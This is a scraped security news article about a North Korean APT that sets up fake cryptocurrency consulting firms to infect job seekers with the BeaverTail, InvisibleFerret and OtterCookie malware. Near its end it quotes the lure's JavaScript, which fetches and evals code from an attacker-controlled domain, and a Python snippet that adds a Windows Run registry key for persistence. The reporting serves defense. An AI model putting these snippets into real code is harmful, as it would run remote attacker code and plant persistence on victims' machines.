A sophisticated North Korean advanced persistent threat (APT) group known as \u201cContagious Interview\u201d has established elaborate fake cryptocurrency consulting companies to target job seekers with specialized malware.<\/p>\n
The group, a subunit of the infamous North Korean state-sponsored Lazarus Group, has created three front companies\u2014BlockNovas LLC, Angeloper Agency, and SoftGlide LLC\u2014to distribute malware through deceptive job interview processes.<\/p>\n
![\"\"](\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjuUYXGTld5uCMPTKFvh-joJP9PbMV0XyJJnicXtvMxH1Lwh0miRUIM-U1ZvemNJtZnO2Z8U93kROZck_X7PTwhCAuvdOq-a0ZoknUEjF4i3HqJMO00S-v7-EF091m2jRO6vFzJgWB-h-KaamKtZYD6y1kzcUUmuZHYUGiiIMv7P30FkiXrHdsNvSGbAMY\/s16000\/Blocknovas%255B.%255Dcom%2520site%2520%28Source%2520-%2520Silent%2520Push%29.webp?ssl=1\")
The campaign targets cryptocurrency professionals and developers with promises of high-paying remote positions.<\/p>\n
Job applicants who engage with these fraudulent companies are unknowingly exposed to a trio of malware<\/a> strains: BeaverTail, InvisibleFerret, and OtterCookie.<\/p>\n These malicious tools are specifically designed to steal cryptocurrency wallet credentials, browser data, and provide backdoor access to victim machines.<\/p>\n Silent Push threat analysts uncovered<\/a> this elaborate scheme after identifying unusual configurations in BeaverTail malware samples.<\/p>\n Their investigation revealed the threat actors heavily utilize AI-generated images to create convincing \u201cemployee\u201d profiles across multiple platforms, including LinkedIn, where the fake companies maintain active presences complete with falsified work histories and client testimonials.<\/p>\n The APT group\u2019s technical sophistication is evident in their cross-platform malware deployment strategy, which affects Windows, macOS, and Linux systems.<\/p>\n One victim reported that their MetaMask wallet was compromised shortly after running code provided during a skill assessment test from BlockNovas.<\/p>\n Analysis of the compromised system revealed connections to command and control servers at domains including lianxinxiao[.]com.<\/p>\n The infection process begins when candidates apply for positions through legitimate job sites like Upwork, Freelancer.com, or cryptocurrency-specific job boards.<\/p>\n After initial contact, applicants are directed to company portals where they encounter a multi-stage interview process.<\/p>\n The critical infection point occurs during the \u201cskill assessment\u201d phase, where candidates are asked to record a video introduction.<\/p>\n When attempting to access camera permissions, the site presents an error message with a supposed fix involving pasting code into a terminal:-<\/p>\n This innocent-looking code actually fetches and executes the BeaverTail JavaScript<\/a> malware, which subsequently downloads InvisibleFerret, a Python-based backdoor.<\/p>\n The malware establishes persistence through various mechanisms depending on the operating system.<\/p>\n On Windows systems, it creates registry entries:-<\/p>\n The malware specifically targets cryptocurrency wallets<\/a>, including MetaMask, BNB Chain, Coinbase, TronLink, Phantom, Crypto.com, and Coin98.<\/p>\n It exfiltrates data to attacker-controlled servers and can deploy additional payloads based on C2 instructions.<\/p>\n To avoid falling victim to such attacks, cybersecurity experts recommend scrutinizing job offers thoroughly, never executing code from unknown sources during interviews, and using dedicated devices for cryptocurrency management.<\/p>\n Job seekers should verify company legitimacy through multiple channels before engaging with technical assessments that require executing code.<\/p>\n The post North Korean APT Hackers Create Companies to Deliver Malware Strains Targeting Job Seekers<\/a> appeared first on Cyber Security News<\/a>.<\/p>\n<\/div>\n![\"\"](\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhZu1BTGzi9nRuvs9mFD5QpuXjeGiftIKE5zBP1zxMsMKVoj-s1-ucYWbYR9HG8qnF2kEnLLOgSacHRSSmDv03qZXTSUG-sPgL_uraIhz_2AUplov4nkDy2rnQfIzjIpnwn7QDHmjDRytGPQ31gE7Gc73iA7mSDRuY2s0iwJJPh6nQVLtZYRaedY82QBu4\/s16000\/Fake%2520profiles%2520%28Source%2520-%2520Silent%2520Push%29.webp?ssl=1\")
![\"\"](\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEj7W6ThfpGRhdht3uJeWQztkXrXd5SontAiqZOK4Altwf4x849j5oWl8V8fm7uuV7-_4lR8Gupe2RjkBbOT-syFs353LFh96WEgHaLFcWlGrrWiFfDLd7Um8k5vuB0Cc_Ylo_QXRnU8k6hxOTcQGzeppAhnNrmlEc6OhpQLXJm7712-RXY4XTuaA9lZHSk\/s16000\/Fake%2520employee%2520profiles%2520%28Source%2520-%2520Silent%2520Push%29.webp?ssl=1\")
![\"\"](\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgTJIxE5kn88cvs1clMgMtK_-vkQ380efttL-J3hWFnnDDpIjcH7hAAN9dvQ8Anpi0cSzXY0ZE9KSPj52aNzle4yWqQ2gcIqIjXl1yAbP2Lzq6mz0ncv3HFte-lyddj6m4LXSNW6phs8HUt8_9ugZ8KbgSTPrlp3a7pcHyFp799tOHoj26qsd5oS5nlfwE\/s16000\/BeaverTail%2520distributing%2520domain%2520lianxinxiao%255B.%255D.com%2520%28Source%2520-%2520Silent%2520Push%29.webp?ssl=1\")
Infection Mechanism: The Fake Interview Flow<\/strong><\/h2>\n
fetch(eval(decodeURIComponent(''lianxinxiao[.]com:5000\/tokenizer'')))\n.then(response => response.text()) \n.then(data => { eval(data); });<\/code><\/pre>\nimport winreg\nkey_path = r\"SOFTWAREMicrosoftWindowsCurrentVersionRun\"\nkey = winreg.HKEY_CURRENT_USER\nwith winreg.OpenKey(key, key_path, 0, winreg.KEY_ALL_ACCESS) as registry_key:\n winreg.SetValueEx(registry_key, \"pythonws\", 0, winreg.REG_SZ, f'{python_exe} {script_path}')<\/code><\/pre>\nMalware Trends Report Based on 15000 SOC Teams Incidents, Q1 2025 out!->\u00a0Get Your Free Copy<\/a><\/code><\/strong><\/p>\n